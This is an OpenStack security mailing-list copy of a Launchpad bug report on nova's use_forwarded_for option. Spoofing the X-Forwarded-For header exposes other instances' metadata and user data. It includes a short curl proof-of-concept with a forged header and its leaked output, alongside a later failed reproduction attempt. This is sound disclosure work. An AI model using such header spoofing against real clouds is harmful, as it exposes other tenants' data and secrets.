[Openstack-security] [Bug 1563954] Re: use_forwarded_for exposes metadata
XiaojueGuan
1563954 at bugs.launchpad.net
Fri Dec 6 10:41:34 UTC 2019
this bug might already fixed, i tried to reproduce but failed with devstack.
[stack at devstack devstack]$ openstack server create --image centos7 --flavor ds1G --network f2a39df5-0938-4973-9810-a80d341229bf --user-data /tmp/data test1
+-------------------------------------+------------------------------------------------+
| Field | Value |
+-------------------------------------+------------------------------------------------+
| OS-DCF:diskConfig | MANUAL |
| OS-EXT-AZ:availability_zone | |
| OS-EXT-SRV-ATTR:host | None |
| OS-EXT-SRV-ATTR:hypervisor_hostname | None |
| OS-EXT-SRV-ATTR:instance_name | |
| OS-EXT-STS:power_state | NOSTATE |
| OS-EXT-STS:task_state | scheduling |
| OS-EXT-STS:vm_state | building |
| OS-SRV-USG:launched_at | None |
| OS-SRV-USG:terminated_at | None |
| accessIPv4 | |
| accessIPv6 | |
| addresses | |
| adminPass | TuHp5eHEMMfW |
| config_drive | |
| created | 2019-12-06T10:32:10Z |
| flavor | ds1G (d2) |
| hostId | |
| id | afdecb55-f3e1-4099-b947-1704112cb9ae |
| image | centos7 (2f2396d2-b32e-4275-93b3-df9fb376dc36) |
| key_name | None |
| name | test1 |
| progress | 0 |
| project_id | 9aafb875525b45b79be2d1ca5d27ffb0 |
| properties | |
| security_groups | name='default' |
| status | BUILD |
| updated | 2019-12-06T10:32:10Z |
| user_id | d994888b0c764c8288cc1162f69b8d8b |
| volumes_attached | |
+-------------------------------------+------------------------------------------------+
[stack at devstack devstack]$ curl -H 'X-Forwarded-For: 192.168.199.151' http://localhost:8775/latest/user-data/
<html>
<head>
<title>400 Bad Request</title>
</head>
<body>
<h1>400 Bad Request</h1>
X-Instance-ID header is missing from request.<br /><br />
</body>
--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1563954
Title:
use_forwarded_for exposes metadata
Status in OpenStack Compute (nova):
Confirmed
Status in OpenStack Security Advisory:
Opinion
Status in OpenStack Security Notes:
Fix Released
Bug description:
The nova metadata service uses the remote address to determine which
metadata to retrieve. In order to work behind a proxy there is an
option use_forwarded_for which will use the X-Forwarded-For header to
determine the remote IP.
If this option is set then anyone who can access the metadata port can
request metadata for any instance if they know the IP.
The user data is also exposed.
$ echo 123456 > /tmp/data
$ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
<wait>
$ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
123456
At a minimum this side-effect isn't documented anywhere I could find.
To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1563954/+subscriptions
More information about the Openstack-security
mailing list